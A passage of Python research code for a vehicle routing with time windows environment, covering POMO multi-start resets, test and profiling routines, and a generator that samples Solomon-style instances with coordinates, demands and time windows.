self.cur_time = self.cur_time[cur_idx].repeat_interleave(samples_fact, dim=0)
self.cur_time_to_depot = self.cur_time_to_depot[cur_idx].repeat_interleave(samples_fact, dim=0)
self._total = self._total.repeat_interleave(samples_fact, dim=0)
def _reset_pomo(self):
"""Sample different starting nodes for POMO sample rollouts and
directly move vehicles from depot to their start nodes."""
# get the nodes in the vicinity of the depot
nbh = self.get_node_nbh(self.depot_node)
# remove depot self-loop
nbh = nbh[:, :, 1:]
if self.pomo_single_start_node:
# select only one random start node per sample, independent of max_concurrent_vehicles
num_start_nodes = 1
# per convention we always select the node for the first tour
start_tours = self._zero[None].expand(self.bs, -1).view(-1, 1)
            # order the nbh nodes by earliest TW start time and select the first num_samples
nbh = nbh.view(-1, self.num_samples, self.max_concurrent_vehicles, self.k_nbh_size-1)[:, 0, 0, :]
early_tw_idx = (
self.tw.view(-1, self.num_samples, self.graph_size, 2)[:, 0, :, 0]
.gather(dim=-1, index=nbh).argsort(dim=-1)[:, :self.num_samples]
)
# all vehicles start at depot -> nbh is exactly the same for each sample of the same instance
# so we get the first num_samples sorted start nodes of first sample and reshape back to batch
start_nodes = nbh.gather(dim=-1, index=early_tw_idx).view(-1, 1)
else:
num_start_nodes = self.max_concurrent_vehicles
# check the TW and select the fraction with the earliest TW as possible start nodes
# since nodes with late TW cannot be optimal!
k = math.floor((self.k_nbh_size-1) * self.pomo_nbh_frac)
early_tw_idx = self.tw[:, :, 0].gather(dim=-1, index=nbh[:, 0, :]).argsort(dim=-1)[:, :k]
# all vehicles start at depot -> nbh is exactly the same for all max_concurrent_vehicles per instance
# so we get first only and expand to full max_concurrent_vehicles
nbh = nbh.gather(dim=-1, index=early_tw_idx[:, None, :].expand(self.bs, self.max_concurrent_vehicles, k))
# sample random idx
# we need to sample num_samples different start node configurations of
# the max_concurrent_vehicles used
try:
rnd_idx = self._randint(
bs=self.bs,
n=self.max_concurrent_vehicles,
high=k,
)
except RuntimeError:
raise RuntimeError(f"sample set for POMO has size {k} which is too "
f"small for {self.num_samples} samples! "
f"Try increasing 'k_nbh_frac' of env.")
start_nodes = nbh.gather(dim=-1, index=rnd_idx[:, :, None]).view(self.bs, -1)
start_tours = torch.arange(self.max_concurrent_vehicles, device=self.device)[None, :].expand(self.bs, -1)
# execute pseudo steps for each tour-start_node sample combination
msk = torch.ones(self.bs, dtype=torch.bool, device=self.device)
cost = 0
for i in range(num_start_nodes):
tour_select = start_tours[:, i]
next_node = start_nodes[:, i]
tour_plan_select = self.active_to_plan_idx[self._bidx, tour_select]
cost += self._update(tour_select, next_node, msk)
# add next node in tour
nxt = self.next_index_in_tour[self._bidx, tour_select]
self.tour_plan[self._bidx, tour_plan_select, nxt] = next_node.to(torch.int16)
# increase idx of next position in tour
self.next_index_in_tour[self._bidx, tour_select] = nxt + 1
self._visited[self._bidx, next_node] = 1
# depot node is never marked as visited!
self._visited[:, 0] = 0
# update graph data
self.to_graph()
self._total += cost
self._step += num_start_nodes
# ============= #
# ### TEST #### #
# ============= #
def _test():
from torch.utils.data import DataLoader
from lib.routing import RPDataset, GROUPS, TYPES, TW_FRACS
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
SMP = 128
N = 100
BS = 64
BS_ = BS
MAX_CON = 5
CUDA = False
SEED = 123
POMO = True
N_POMO = 8
POMO_SINGLE = True
if POMO:
BS_ = BS//N_POMO
SMP = 2 * BS_
INFER = True
device = torch.device("cuda" if CUDA else "cpu")
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(SEED)
data = ds.sample(sample_size=SMP, graph_size=N)
dl = DataLoader(
data,
batch_size=BS_,
collate_fn=lambda x: x, # identity -> returning simple list of instances
shuffle=False
)
env = RPEnv(debug=True,
device=device,
max_concurrent_vehicles=MAX_CON,
k_nbh_frac=0.4,
pomo=POMO,
pomo_single_start_node=POMO_SINGLE,
num_samples=N_POMO,
inference=INFER,
)
env.seed(SEED+1)
for batch in dl:
env.load_data(batch)
obs = env.reset()
done = False
i = 0
start_tws = env._stack_to_tensor(batch, "tw")[:, :, 1]
#print(env.coords[:, 0])
while not done:
#print(i)
# select tour randomly and then select available node with earliest TW
tr = torch.randint(MAX_CON, size=(BS,), device=device)
t_nbh = obs.nbh[torch.arange(BS), tr]
t_msk = obs.nbh_mask[torch.arange(BS), tr]
nd = torch.zeros(BS, dtype=torch.long, device=device)
for j, (nbh, msk, start_tw) in enumerate(zip(t_nbh, t_msk, start_tws)):
available_idx = nbh[~msk] # mask is True where infeasible
idx = available_idx[start_tw[available_idx].argsort(-1, descending=False)]
nd[j] = idx[0]
obs, rew, done, info = env.step(torch.stack((tr, nd), dim=-1))
i += 1
#print(info)
sol = env.export_sol()
print(sol)
def _test_io():
from torch.utils.data import DataLoader
from lib.routing import RPDataset, GROUPS, TYPES, TW_FRACS
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
SMP = 64
N = 50
BS = 16
BS_ = BS
MAX_CON = 3
CUDA = False
SEED = 123
POMO = True
N_SMP = 16
if N_SMP > 1:
assert BS % N_SMP == 0
BS_ = BS//N_SMP
assert BS_ == 1
SMP = 2 * BS_
INFER = True # IO only for inference!
ITERS = 3
NO_COST = True
device = torch.device("cuda" if CUDA else "cpu")
rnd = np.random.default_rng(SEED)
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(SEED)
data = ds.sample(sample_size=SMP, graph_size=N)
dl = DataLoader(
data,
batch_size=BS_,
collate_fn=lambda x: x, # identity -> returning simple list of instances
shuffle=False
)
env = RPEnv(debug=True,
device=device,
max_concurrent_vehicles=MAX_CON,
k_nbh_frac=0.4,
pomo=POMO,
num_samples=N_SMP,
inference=INFER,
)
env.seed(SEED+1)
for batch in dl:
env.load_data(batch)
obs = env.reset()
start_tws = env._stack_to_tensor(batch, "tw")[:, :, 1]
#print(env.coords[:, 0])
for m in range(ITERS):
print(f"iter: {m}")
done = False
i = 0
while not done:
#print(i)
# select tour randomly and then select available node with earliest TW
tr = torch.randint(MAX_CON, size=(BS,), device=device)
t_nbh = obs.nbh[torch.arange(BS), tr]
t_msk = obs.nbh_mask[torch.arange(BS), tr]
nd = torch.zeros(BS, dtype=torch.long, device=device)
for j, (nbh, msk, start_tw) in enumerate(zip(t_nbh, t_msk, start_tws)):
available_idx = nbh[~msk] # mask is True where infeasible
idx = available_idx[start_tw[available_idx].argsort(-1, descending=False)]
nd[j] = idx[0]
obs, rew, done, info = env.step(torch.stack((tr, nd), dim=-1))
i += 1
# export solution
sol, cost = env.export_sol(3, 3, "dis")
print(sol[0])
# solution shape is (BS, num_samples, num_tours, ...)
#assert len(sol) == BS
new_solutions = []
for s in sol:
s = s[0] # here only use first sample
part = MAX_CON
idx = (-np.array([len(t) for t in s])).argsort(axis=-1)
part_idx = idx[:part]
comp_idx = idx[part:]
new_sol = []
for idx in part_idx:
t = s[idx]
tlim = rnd.choice(np.arange(2, max(len(t)-1, 3)))
assert tlim >= 2
new_sol.append(t[:tlim])
#new_sol += [[el] for el in t[tlim:]]
for idx in comp_idx:
new_sol.append([0] + s[idx] + [0]) # add depot idx at start and end
new_solutions.append([new_sol[:28]]) # in list corresponding to num_samples=1
if NO_COST:
cost = None
new_solutions = [s*N_SMP for s in new_solutions]
obs = env.import_sol(new_solutions, cost)
def _profile():
from torch.utils.data import DataLoader
from lib.routing import RPDataset, GROUPS, TYPES, TW_FRACS
from torch.profiler import profile, record_function, ProfilerActivity, schedule
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
SMP = 128
N = 50
BS = 64
BS_ = BS
MAX_CON = 3
CUDA = False
SEED = 123
POMO = False
N_POMO = 8
if POMO:
BS_ = BS // N_POMO
SMP = 2*BS_
INFER = True
device = torch.device("cuda" if CUDA else "cpu")
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(SEED)
data = ds.sample(sample_size=SMP, graph_size=N)
dl = DataLoader(
data,
batch_size=BS_,
collate_fn=lambda x: x, # identity -> returning simple list of instances
shuffle=False
)
env = RPEnv(debug=True,
device=device,
max_concurrent_vehicles=MAX_CON,
k_nbh_frac=0.4,
pomo=POMO,
num_samples=N_POMO,
inference=INFER,
)
env.seed(SEED + 1)
s = schedule(
wait=0,
warmup=0,
active=N,
repeat=2
)
with profile(
activities=[ProfilerActivity.CPU] + ([ProfilerActivity.CUDA] if CUDA else []),
schedule=s,
record_shapes=False,
profile_memory=True,
with_stack=True,
) as prof:
for batch in dl:
with record_function(">>env.load()"):
env.load_data(batch)
with record_function(">>env.reset()"):
obs = env.reset()
done = False
i = 0
start_tws = env._stack_to_tensor(batch, "tw")[:, :, 1]
# print(env.coords[:, 0])
while not done:
# print(i)
# select tour randomly and then select available node with earliest TW
tr = torch.randint(MAX_CON, size=(BS,), device=device)
t_nbh = obs.nbh[torch.arange(BS), tr]
t_msk = obs.nbh_mask[torch.arange(BS), tr]
nd = torch.zeros(BS, dtype=torch.long, device=device)
for j, (nbh, msk, start_tw) in enumerate(zip(t_nbh, t_msk, start_tws)):
available_idx = nbh[~msk] # mask is True where infeasible
idx = available_idx[start_tw[available_idx].argsort(-1, descending=False)]
nd[j] = idx[0]
with record_function(">>env.step()"):
obs, rew, done, info = env.step(torch.stack((tr, nd), dim=-1))
i += 1
with record_function(">>env.export_sol()"):
sol = env.export_sol()
# report
print(prof.key_averages(group_by_stack_n=7).table(
sort_by="gpu_time_total" if CUDA else "cpu_time_total",
row_limit=100))
```
#### File: lib/routing/generator.py
```python
import os
import sys
from typing import Union, Optional, Tuple, List, Dict
import math
import re
from warnings import warn
import itertools as it
import pickle
import logging
import numpy as np
import scipy.stats as stats
from scipy.linalg import block_diag
import torch
from torch.utils.data import Dataset
from lib.routing.formats import RPInstance
from lib.utils.challenge_utils import dimacs_challenge_dist_fn_np
__all__ = [
"RPGenerator", "RPDataset",
'GROUPS', 'TYPES', 'TW_FRACS',
]
logger = logging.getLogger(__name__)
# Solomon instance naming components
GROUPS = ["r", "c", "rc"]
TYPES = ["1", "2"]
TW_FRACS = [0.25, 0.5, 0.75, 1.0]
MAX_TRY = 100
def format_ds_save_path(directory, args=None, affix=None, fname=''):
"""Format the path for saving datasets"""
directory = os.path.normpath(os.path.expanduser(directory))
if args is not None:
for k, v in args.items():
if isinstance(v, str):
fname += f'_{v}'
else:
fname += f'_{k}_{v}'
if affix is not None:
fname = str(affix) + fname
if fname != '':
fpath = os.path.join(directory, fname)
else:
fpath = directory
if fpath[-3:] not in ['.pt', 'dat', 'pkl']:
fpath += '.pt'
if os.path.isfile(fpath):
print('Dataset file with same name exists already. Overwrite file? (y/n)')
a = input()
if a != 'y':
print('Could not write to file. Terminating program...')
sys.exit()
return fpath
class CoordsSampler:
"""Sampler implementing different options to generate coordinates for RPs."""
def __init__(self,
n_components: int = 5,
n_dims: int = 2,
coords_sampling_dist: str = "uniform",
covariance_type: str = "diag",
mus: Optional[np.ndarray] = None,
sigmas: Optional[np.ndarray] = None,
mu_sampling_dist: str = "normal",
mu_sampling_params: Tuple = (0, 1),
sigma_sampling_dist: str = "uniform",
sigma_sampling_params: Tuple = (0.025, 0.05),
random_state: Optional[Union[int, np.random.RandomState, np.random.Generator]] = None,
verbose: bool = False,
):
"""
Args:
n_components: number of mixture components
n_dims: dimension of sampled features, e.g. 2 for Euclidean coordinates
            coords_sampling_dist: type of distribution to sample coordinates, one of ['uniform', 'gm', 'gaussian_mixture', 'unf+gm']
covariance_type: type of covariance matrix, one of ['diag', 'full']
mus: user provided mean values for mixture components
sigmas: user provided covariance values for mixture components
            mu_sampling_dist: type of distribution to sample initial mus, one of ['uniform', 'normal', 'ring', 'io_ring']
mu_sampling_params: parameters for mu sampling distribution
sigma_sampling_dist: type of distribution to sample initial sigmas, one of ['uniform', 'normal']
sigma_sampling_params: parameters for sigma sampling distribution
random_state: seed integer or numpy random (state) generator
verbose: verbosity flag to print additional info and warnings
"""
self.nc = n_components
self.f = n_dims
self.coords_sampling_dist = coords_sampling_dist.lower()
self.covariance_type = covariance_type
self.mu_sampling_dist = mu_sampling_dist.lower()
self.mu_sampling_params = mu_sampling_params
self.sigma_sampling_dist = sigma_sampling_dist.lower()
self.sigma_sampling_params = sigma_sampling_params
self.verbose = verbose
# set random generator
if random_state is None or isinstance(random_state, int):
self.rnd = np.random.default_rng(random_state)
else:
self.rnd = random_state
if self.coords_sampling_dist in ["gm", "gaussian_mixture", "unf+gm"]:
# sample initial mu and sigma if not provided
if mus is not None:
assert (
(mus.shape[0] == self.nc and mus.shape[1] == self.f) or
(mus.shape[0] == self.nc * self.f)
)
self.mu = mus.reshape(self.nc * self.f)
else:
self.mu = self._sample_mu(mu_sampling_dist.lower(), mu_sampling_params)
if sigmas is not None:
assert (
(sigmas.shape[0] == self.nc and sigmas.shape[1] == (self.f if covariance_type == "diag" else self.f**2))
or (sigmas.shape[0] == (self.nc * self.f if covariance_type == "diag" else self.nc * self.f**2))
)
self.sigma = self._create_cov(sigmas, cov_type=covariance_type)
else:
covariance_type = covariance_type.lower()
if covariance_type not in ["diag", "full"]:
raise ValueError(f"unknown covariance type: <{covariance_type}>")
self.sigma = self._sample_sigma(sigma_sampling_dist.lower(), sigma_sampling_params, covariance_type)
def seed(self, seed: Optional[int] = None):
if seed is not None:
self.rnd = np.random.default_rng(seed)
def resample_gm(self):
"""Resample initial mus and sigmas."""
self.mu = self._sample_mu(
self.mu_sampling_dist,
self.mu_sampling_params
)
self.sigma = self._sample_sigma(
self.sigma_sampling_dist,
self.sigma_sampling_params,
self.covariance_type
)
def sample(self,
n: int,
resample_mixture_components: bool = True,
**kwargs) -> np.ndarray:
"""
Args:
n: number of samples to draw
resample_mixture_components: flag to resample mu and sigma of all mixture components for each instance
Returns:
            coords: (n+1, n_dims), the sampled depot at index 0 followed by the n node coordinates
"""
        # sample depot from an inner circle
#depot = self._sample_unf_coords(1, **kwargs)
depot = self._sample_ring(size=1, radius_range=(0, 0.13))
depot = (depot + 1)/2 # normalize
depot = np.maximum(np.minimum(depot, 0.7), 0.3)
if self.coords_sampling_dist == "uniform":
coords = self._sample_unf_coords(n, **kwargs)
else:
if resample_mixture_components:
self.resample_gm()
if self.coords_sampling_dist == "unf+gm":
n_unf = n//2
n_gm = n-n_unf
unf_coords = self._sample_unf_coords(n_unf, **kwargs)
n_per_c = math.ceil(n_gm / self.nc)
self.mu = self._sample_mu(dist="ring", params=(0.9, 1.2))
gm_coords = self._sample_gm_coords(n_per_c, n_gm, **kwargs)
coords = np.vstack((unf_coords, gm_coords))
else:
n_per_c = math.ceil(n / self.nc)
coords = self._sample_gm_coords(n_per_c, n, **kwargs)
return np.vstack((depot, coords)).astype(np.float32)
def _sample_mu(self, dist: str, params: Tuple):
size = self.nc * self.f
if dist == "uniform":
return self._sample_uniform(size, params[0], params[1])
elif dist == "normal":
return self._sample_normal(size, params[0], params[1])
elif dist == "ring":
return self._sample_ring(self.nc, params).reshape(-1)
elif dist == "io_ring":
return self._sample_io_ring(self.nc).reshape(-1)
else:
raise ValueError(f"unknown sampling distribution: <{dist}>")
def _sample_sigma(self, dist: str, params: Tuple, cov_type: str):
if cov_type == "full":
size = self.nc * self.f**2
else:
size = self.nc * self.f
if dist == "uniform":
x = self._sample_uniform(size, params[0], params[1])
elif dist == "normal":
x = np.abs(self._sample_normal(size, params[0], params[1]))
else:
raise ValueError(f"unknown sampling distribution: <{dist}>")
return self._create_cov(x, cov_type=cov_type)
def _create_cov(self, x, cov_type: str):
if cov_type == "full":
# create block diagonal matrix to model covariance only
# between features of each individual component
x = x.reshape((self.nc, self.f, self.f))
return block_diag(*x.tolist())
else:
return np.diag(x.reshape(-1))
def _sample_uniform(self,
size: Union[int, Tuple[int, ...]],
low: Union[int, np.ndarray] = 0.0,
high: Union[int, np.ndarray] = 1.0):
return self.rnd.uniform(size=size, low=low, high=high)
def _sample_normal(self,
size: Union[int, Tuple[int, ...]],
mu: Union[int, np.ndarray],
sigma: Union[int, np.ndarray]):
return self.rnd.normal(size=size, loc=mu, scale=sigma)
def _sample_ring(self, size: int, radius_range: Tuple = (0, 1)):
"""inspired by https://stackoverflow.com/a/41912238"""
#eps = self.rnd.standard_normal(1)[0]
if size == 1:
angle = self.rnd.uniform(0, 2*np.pi, size)
#eps = self.rnd.uniform(0, np.pi, size)
else:
angle = np.linspace(0, 2*np.pi, size)
#angle = np.linspace(0+eps, 2*np.pi+eps, size)
#angle = rnd.uniform(0, 2*np.pi, size)
#angle += self.rnd.standard_normal(size)*0.05
angle += self.rnd.uniform(0, np.pi/3, size)
d = np.sqrt(self.rnd.uniform(*radius_range, size))
#d = np.sqrt(rnd.normal(np.mean(radius_range), (radius_range[1]-radius_range[0])/2, size))
return np.concatenate((
(d*np.cos(angle))[:, None],
(d*np.sin(angle))[:, None]
), axis=-1)
def _sample_io_ring(self, size: int):
"""sample an inner and outer ring."""
# have approx double the number of points in outer ring than inner ring
num_inner = size//3
num_outer = size-num_inner
inner = self._sample_ring(num_inner, (0.01, 0.2))
outer = self._sample_ring(num_outer, (0.21, 0.5))
return np.vstack((inner, outer))
def _sample_unf_coords(self, n: int, **kwargs) -> np.ndarray:
"""Sample coords uniform in [0, 1]."""
return self.rnd.uniform(size=(n, self.f))
def _sample_gm_coords(self, n_per_c: int, n: Optional[int] = None, **kwargs) -> np.ndarray:
"""Sample coordinates from k Gaussians."""
coords = self.rnd.multivariate_normal(
mean=self.mu,
cov=self.sigma,
size=n_per_c,
).reshape(-1, self.f) # (k*n, f)
if n is not None:
            coords = coords[:n]  # if n % k != 0, some components contribute one more sample than others
# normalize coords in [0, 1]
return self._normalize_coords(coords)
@staticmethod
def _normalize_coords(coords: np.ndarray):
"""Applies joint min-max normalization to x and y coordinates."""
coords[:, 0] = coords[:, 0] - coords[:, 0].min()
coords[:, 1] = coords[:, 1] - coords[:, 1].min()
max_val = coords.max() # joint max to preserve relative spatial distances
coords[:, 0] = coords[:, 0] / max_val
coords[:, 1] = coords[:, 1] / max_val
return coords
class InstanceSampler:
"""Sampler class for samplers based on Solomon benchmark data statistics."""
def __init__(self, cfg: Dict, seed: int = 1):
# set key-value pairs from Solomon instance stats
# as InstanceSampler instance attributes
for k, v in cfg.items():
setattr(self, k, v)
# initialize random generator
self.rnd = np.random.default_rng(seed)
# set group id (remove instance number from id str)
self.group_id = re.sub(r'\d+', '', self.id).upper()
# coords sampler (depends on group id)
if self.group_id == "R":
self.coords_sampler = CoordsSampler(
coords_sampling_dist="uniform",
random_state=seed+1
)
elif self.group_id == "C":
self.coords_sampler = CoordsSampler(
n_components=self.n_components,
coords_sampling_dist="gm",
mu_sampling_dist="io_ring",
sigma_sampling_params=(0., 0.005),
random_state=seed+1
)
elif self.group_id == "RC":
self.coords_sampler = CoordsSampler(
n_components=self.n_components,
coords_sampling_dist="unf+gm",
mu_sampling_dist="ring",
sigma_sampling_params=(0.01, 0.01),
random_state=seed+1
)
else:
raise ValueError(f"unknown group_id: {self.group_id} (from {self.id}).")
# demand sampler
### e.g.
#'demand': {'dist': 'poisson', 'params': ([0.81], {0: 10.0, 1: 20.0, 2: 30.0, 3: 40.0, 4: 50.0})}
p, p_misc = self.demand['params'] # tuple: (dist params, additional miscellaneous params)
self.demand_p_misc = p_misc
if self.demand['dist'] == "poisson":
self.demand_sampler = stats.poisson(*p)
elif self.demand['dist'] == "gamma":
self.demand_sampler = stats.gamma(*p)
else:
raise ValueError(f"unknown demand_sampler cfg: {self.demand}.")
# TW start sampler
### e.g.
# 'tw_start': {'dist': 'KDE', 'params': <scipy.stats.kde.gaussian_kde object at 0x7ff5fe8c72e0>,
# 'tw_start': {'dist': 'normal', 'params': (0.34984000000000004, 0.23766332152858588)}
if self.tw_start['dist'] == "gamma":
self.tw_start_sampler = stats.gamma(*self.tw_start['params'])
elif self.tw_start['dist'] == "normal":
self.tw_start_sampler = stats.norm(*self.tw_start['params'])
elif self.tw_start['dist'] == "KDE":
self.tw_start_sampler = self.tw_start['params'] # assigns fitted KDE model
else:
raise ValueError(f"unknown tw_start_sampler cfg: {self.tw_start}.")
# TW len sampler
if self.tw_len['dist'] == "const":
self.tw_len_sampler = self.tw_len['params'] # this is the normalized len, there is also self.org_tw_len
elif self.tw_len['dist'] == "gamma":
self.tw_len_sampler = stats.gamma(*self.tw_len['params'])
elif self.tw_len['dist'] == "normal":
self.tw_len_sampler = stats.norm(*self.tw_len['params'])
elif self.tw_len['dist'] == "KDE":
self.tw_len_sampler = self.tw_len['params'] # assigns fitted KDE model
else:
raise ValueError(f"unknown tw_len_sampler cfg: {self.tw_len}.")
# service time in Solomon data is constant for each instance, so mean == exact value
self.service_time = self.norm_summary.loc['mean', 'service_time']
def seed(self, seed: Optional[int] = None):
if seed is not None:
self.rnd = np.random.default_rng(seed)
self.coords_sampler.seed(seed+1)
def sample(self, size: int, **kwargs) -> RPInstance:
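        """Sample a single feasible RPInstance with `size` customer nodes (plus depot),
        retrying on infeasible draws up to MAX_TRY times."""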
i = 0
feasible = False
while not feasible:
if i > MAX_TRY:
raise RuntimeError(f"Encountered many infeasible instances during sampling. "
f"Try to adapt sampling parameters.")
try:
coords = self._sample_coords(size)
# Euclidean distance
dist_to_depot = dimacs_challenge_dist_fn_np(coords[1:], coords[0])
time_to_depot = dist_to_depot / self.org_service_horizon
demand = self._sample_demand(size)
tw_start, tw_mask, num_tws = self._sample_tw_start(size, time_to_depot)
tw = self._sample_tw_end(
size=size,
tw_start=tw_start,
time_to_depot=time_to_depot,
tw_mask=tw_mask,
num_tws=num_tws,
)
except AssertionError as ae:
logger.debug(f"error while sampling. retrying... \n {ae}")
i += 1
continue
feasible = True
assert not np.any((tw[1:, 1] + time_to_depot + self.service_time) > 1.0)
return RPInstance(
coords=coords,
demands=demand,
tw=tw,
service_time=self.service_time,
graph_size=size+1,
org_service_horizon=self.org_service_horizon,
max_vehicle_number=25,
vehicle_capacity=1.0, # is normalized
service_horizon=1.0, # is normalized
depot_idx=[0],
)
def _sample_coords(self, size: int):
# simple case, all logic is already in coords sampler
return self.coords_sampler.sample(n=size)
def _sample_demand(self, size: int) -> np.ndarray:
"""sample demand according to cfg specifications."""
# POISSON
if self.demand['dist'] == "poisson":
# sample from poisson dist
smp = self.demand_sampler.rvs(size=size, random_state=self.rnd)
mode = int(list(self.demand_p_misc.values())[0])
keys = list(self.demand_p_misc.keys())
smp = np.array([self.demand_p_misc[e] if e in keys else mode for e in smp])
# GAMMA
elif self.demand['dist'] == "gamma":
# sample from gamma dist
smp = self.demand_sampler.rvs(size=size, random_state=self.rnd)
# round to bins
unq, x_lim = self.demand_p_misc
max_diff = np.max(unq[1:]-unq[:-1])
if max_diff < 1 + np.finfo(float).eps:
smp = np.round(smp) # integer range bins
else:
bin_centers = np.array([(l+u)/2 for l, u in zip(unq[:-1], unq[1:])])
smp = np.digitize(smp, bin_centers)
smp = unq[smp]
# truncate if sample value is larger than half a std
# from the max observed in the training data (value saved in 'x_lim')
# and set to median value
m = self.demand_sampler.median()
smp[smp > x_lim] = m
else:
raise RuntimeError
# normalize demands
smp /= self.vehicle_capacity
# simple check of totals
assert smp.sum() < 25, f"total sum of demands larger than total fleet capacity!"
# add depot demand of 0
return np.concatenate((np.zeros(1), smp), axis=0)
def _sample_tw_start(self, size: int, time_to_depot: float
) -> Tuple[np.ndarray, np.ndarray, int]:
"""sample start time of TW according to cfg specifications."""
# get fraction of TW
if self.tw_frac < 1.0:
num_tws = int(np.ceil(size*self.tw_frac))
            tw_mask = np.zeros(size, dtype=bool)
tw_mask[self.rnd.choice(np.arange(size), size=num_tws, replace=False)] = 1
else:
num_tws = size
            tw_mask = np.ones(size, dtype=bool)
# rejection sampling
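        # draw m candidate start times per node that still lacks a feasible value, keep the
        # first feasible candidate per node and double m for the remaining nodes until all
        # nodes have been assigned a TW start.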
mean_tw_len = self.norm_summary.loc['mean', 'tw_len']
eps = 1./self.org_service_horizon
m = 10
infeasible = True
n = num_tws
out = np.empty_like(time_to_depot)
smp_idx = tw_mask.nonzero()[0]
while infeasible:
max_tw_start = 1. - np.repeat(time_to_depot[smp_idx] + self.service_time, m, axis=-1) - mean_tw_len/2
assert np.all(max_tw_start > 0)
if self.tw_start['dist'] == "gamma":
smp = self.tw_start_sampler.rvs(size=m*n, random_state=self.rnd)
elif self.tw_start['dist'] == "normal":
smp = self.tw_start_sampler.rvs(size=m*n, random_state=self.rnd)
elif self.tw_start['dist'] == "KDE":
smp = self.tw_start_sampler.resample(size=m*n, seed=self.rnd)
else:
raise RuntimeError
smp = smp.reshape(-1, m) + eps
feasible = (smp > 0.0) & (smp <= max_tw_start.reshape(-1, m))
has_feasible_val = np.any(feasible, axis=-1)
# argmax returns idx of first True value if there is any, otherwise 0.
first_feasible_idx = feasible[has_feasible_val].argmax(axis=-1)
out[smp_idx[has_feasible_val]] = smp[has_feasible_val, first_feasible_idx]
if np.all(has_feasible_val):
infeasible = False
else:
no_feasible_val = ~has_feasible_val
smp_idx = smp_idx[no_feasible_val]
n = no_feasible_val.sum()
m *= 2
                if m >= 320:  # stop after 5 doublings of m (10 * 2**5 = 320)
# fall back to uniform sampling from valid interval
s = eps
e = max_tw_start
out[smp_idx] = self.rnd.uniform(s, e, size=n)
infeasible = False
# set tw_start to 0 for nodes without TW
out[~tw_mask] = 0
return out, tw_mask, num_tws
def _sample_tw_end(self,
size: int,
tw_start: np.ndarray,
time_to_depot: float,
tw_mask: np.ndarray,
num_tws: int,
) -> np.ndarray:
"""sample end time of TW according to cfg specifications."""
# make sure sampled end is feasible by checking if
# service time + time to return to depot is smaller than total service horizon
eps = 1./self.org_service_horizon
t_delta = time_to_depot[tw_mask]
inc_time = t_delta + self.service_time + eps
smp_idx = tw_mask.nonzero()[0]
out = np.empty_like(time_to_depot)
if self.tw_len['dist'] == "const":
assert np.all(inc_time + t_delta + self.tw_len_sampler < 1.0), \
f"infeasible coordinates encountered"
smp = self.tw_len_sampler # all same constant value
return_time = tw_start[tw_mask] + smp + inc_time
infeasible = return_time >= 1.0
if np.any(infeasible):
inf_idx = smp_idx[infeasible]
tw_start[inf_idx] = tw_start[inf_idx] - (return_time[infeasible] - 1 + eps)
assert np.all(tw_start >= 0)
out[tw_mask] = np.maximum(tw_start[tw_mask] + smp, t_delta + eps)
else:
# rejection sampling
assert np.all(inc_time + t_delta < 1.0)
m = 10
infeasible = True
n = num_tws
while infeasible:
if self.tw_len['dist'] == "gamma":
smp = self.tw_len_sampler.rvs(size=m*n, random_state=self.rnd)
elif self.tw_len['dist'] == "normal":
smp = self.tw_len_sampler.rvs(size=m*n, random_state=self.rnd)
elif self.tw_len['dist'] == "KDE":
smp = self.tw_len_sampler.resample(size=m*n, seed=self.rnd)
else:
raise RuntimeError
smp = smp.reshape(-1, m)
# check feasibility
# tw should be between tw_start + earliest possible arrival time from depot and
# end of service horizon - time required to return to depot
_tws = np.repeat(tw_start[smp_idx], m, axis=-1).reshape(-1, m)
feasible = (
(_tws + np.repeat(t_delta, m, axis=-1).reshape(-1, m) < smp)
&
(_tws + np.repeat(inc_time, m, axis=-1).reshape(-1, m) + smp < 1.0)
)
has_feasible_val = np.any(feasible, axis=-1)
# argmax returns idx of first True value if there is any, otherwise 0.
first_feasible_idx = feasible[has_feasible_val].argmax(axis=-1)
out[smp_idx[has_feasible_val]] = smp[has_feasible_val, first_feasible_idx]
if np.all(has_feasible_val):
infeasible = False
else:
no_feasible_val = ~has_feasible_val
smp_idx = smp_idx[no_feasible_val]
n = no_feasible_val.sum()
t_delta = t_delta[no_feasible_val]
inc_time = inc_time[no_feasible_val]
m *= 2
                    if m >= 320:  # stop after 5 doublings of m (10 * 2**5 = 320)
# fall back to uniform sampling from valid interval
_tws = tw_start[smp_idx]
s = np.maximum(_tws, t_delta) + eps
e = 1. - inc_time
out[smp_idx] = self.rnd.uniform(s, e)
infeasible = False
# add TW end as latest possible arrival time for all nodes without TW constraint
out[~tw_mask] = 1.0 - time_to_depot[~tw_mask] - self.service_time - eps
#assert np.all(out + time_to_depot + self.service_time < 1.0)
return np.concatenate((
np.array([[0, 1]]), # add depot tw start 0 and end 1
np.concatenate((tw_start[:, None], out[:, None]), axis=-1)
), axis=0)
class RPGenerator:
"""Generator unifying sampling procedure."""
def __init__(self,
sample_cfg: Dict,
stats_file_path: str,
seed: int = 1,
):
self.sample_cfg = sample_cfg
self.rnd = np.random.default_rng(seed)
# load stats pkl
with open(stats_file_path, 'rb') as f:
stats_cfg = pickle.load(f)
# get specified cfgs
cfgs = []
for grp in sample_cfg['groups']:
for typ in sample_cfg['types']:
for twf in sample_cfg['tw_fracs']:
cfgs.append(stats_cfg[grp][f"{grp}{typ}"][f"tw_frac={twf}"])
self.cfgs = list(it.chain.from_iterable(cfgs))
# initialize corresponding samplers
self.num_samplers = len(self.cfgs)
self.samplers = []
for cfg in self.cfgs:
self.samplers.append(InstanceSampler(cfg))
def seed(self, seed: Optional[int] = None):
"""Set generator seed."""
self.rnd = np.random.default_rng(seed)
for i in range(self.num_samplers):
self.samplers[i].seed(seed + i + 1)
def generate(self, sample_size: int = 1000, graph_size: int = 100, **kwargs):
"""Generate data with corresponding RP generator function."""
# sample from each instance sampler and take care of truncation if
# sample_size % self.num_samplers != 0
n_per_sampler = math.ceil(sample_size / self.num_samplers)
num_trunc = self.num_samplers * n_per_sampler - sample_size
assert self.num_samplers * n_per_sampler - num_trunc == sample_size
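        # e.g. (illustrative) sample_size=10 with 4 samplers: n_per_sampler=3, num_trunc=2,
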